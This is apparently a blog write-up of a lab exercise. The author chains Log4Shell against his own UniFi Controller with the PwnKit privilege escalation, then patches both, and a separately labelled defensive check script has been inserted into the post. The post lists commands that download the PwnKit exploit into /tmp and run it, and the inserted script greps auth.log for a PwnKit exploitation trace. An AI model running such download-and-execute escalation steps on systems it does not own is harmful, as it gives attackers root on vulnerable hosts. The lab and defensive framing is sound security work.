Pwn’d or Patched, you choose. Unifi, Log4J, and PwnKit

Written by Matt Lee

February 3, 2022

Pwn’d or Patched using CVE 2021-44228 (Log4Shell) and CVE 2021-4034 (PwnKit)

The earlier video –

If you read my initial writeup on the Unifi unpatched status you will know this is still a HUGE issue that needs to be solved.

The new stuff Pwn’d or Patched, you choose –

I have recorded a video walkthrough of the post-compromise steps here.

The setup – Compromising with CVE 2021-44228 (Log4Shell)

Initially I followed a great guide by Sprocket Security on compromising the Unifi Controller with CVE-2021-44228. That guide walked through gaining access and then did amazing work on post exploitation inside the controller application, but not so much on privilege escalation directly at the point of compromise. I started wondering: with all 5,000 vulnerable Unifi Controllers out there, is there a way to compromise the controller and either make it more secure, or do very malicious things within that network or the underlying supported services? Guess what… YES THERE IS… But I am going to do the good thing! (Caveat: I own this controller and it is in a lab. Public IPs, but no assets of merit.)

The Code Walkthrough – Elevating Priv and Patching using CVE 2021-4034

After gaining a foothold as described above in the Sprocket Security guide, instead of pivoting into the software controller I decided to try to string together another vulnerability, and that came in the form of PwnKit, or CVE-2021-4034. A simple download of the PoC shell code found here, written by Oliver Lyak from Denmark, provided a simple method of escalation. Here are the rough command lines used to finish the escalation:

  • curl -fsSL -o /tmp/PwnKit
  • cd /tmp
  • chmod +x ./PwnKit
  • ./PwnKit

Now it is time to be the White Hat in this situation –

  • apt update
  • apt upgrade

Following the prompts, I patched both vulnerabilities at once. The UniFi software update to 6.5.55 fixed the Log4Shell vulnerability, and updating polkit fixed the PwnKit vulnerability. As a result, the UniFi controller is no longer vulnerable to the chained exploits and the kill chain is broken!
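As an added example (not the post's own commands), here is a small POSIX shell check a defender can run on the controller host after the apt upgrade above to confirm both links of the chain are closed. It assumes the `unifi` and `policykit-1` Debian package names, pkexec at /usr/bin/pkexec, and that you pass in the fixed polkit version from your distro's CVE-2021-4034 advisory:

```shell
#!/bin/sh
# Added post-patch check for the chain in this post (not the author's commands).
# Assumptions: UniFi is the 'unifi' .deb (version like 6.5.55-16678-1), polkit is
# the 'policykit-1' package, pkexec lives at /usr/bin/pkexec, and the fixed polkit
# version comes from your distro's CVE-2021-4034 advisory (it differs per distro).

# version_ge A B: succeed if dotted numeric version A >= B (any number of parts).
version_ge() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi > yi) exit 0
            if (xi < yi) exit 1
        }
        exit 0
    }'
}

# 6.5.55 is the UniFi release the post reports as fixing Log4Shell (CVE-2021-44228).
unifi_log4shell_patched() { version_ge "$1" "6.5.55"; }

# Debian-style polkit versions (e.g. 0.105-31+deb11u1) need dpkg's comparison rules.
polkit_pwnkit_patched() { dpkg --compare-versions "$1" ge "$2"; }

# The interim PwnKit mitigation is removing pkexec's setuid bit; report its state.
pkexec_is_setuid() { [ -u "$1" ]; }

# PwnKit exploitation leaves this pkexec error in auth.log; count past occurrences.
pwnkit_trace_count() {
    grep -c 'The value for the SHELL variable was not found the /etc/shells file' "$1" 2>/dev/null || true
}

main() {
    unifi=$(dpkg-query -W -f '${Version}' unifi 2>/dev/null | cut -d- -f1)
    polkit=$(dpkg-query -W -f '${Version}' policykit-1 2>/dev/null)
    if unifi_log4shell_patched "$unifi"; then echo "UniFi $unifi: Log4Shell patched"
    else echo "UniFi '${unifi:-not found}': below 6.5.55, still exposed to CVE-2021-44228"; fi
    if polkit_pwnkit_patched "$polkit" "$1"; then echo "polkit $polkit: PwnKit patched"
    else echo "polkit '${polkit:-not found}': below $1, CVE-2021-4034 still present"; fi
    if pkexec_is_setuid /usr/bin/pkexec; then echo "pkexec is setuid-root (normal once patched)"
    else echo "pkexec setuid bit removed (interim mitigation in place)"; fi
    n=$(pwnkit_trace_count /var/log/auth.log)
    echo "PwnKit exploitation traces in /var/log/auth.log: ${n:-0}"
}

# Usage: ./check.sh <fixed-polkit-version-from-your-advisory>
if [ $# -ge 1 ]; then main "$1"; fi
```

Run it as root after the upgrade; a non-zero trace count means the host should be treated as possibly compromised before the patch, not merely unpatched.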

The takeaway –

Patch your stuff, so I don't have to. If someone with basic skills in ethical hacking can do it, the threat actors will certainly do it and likely already are.
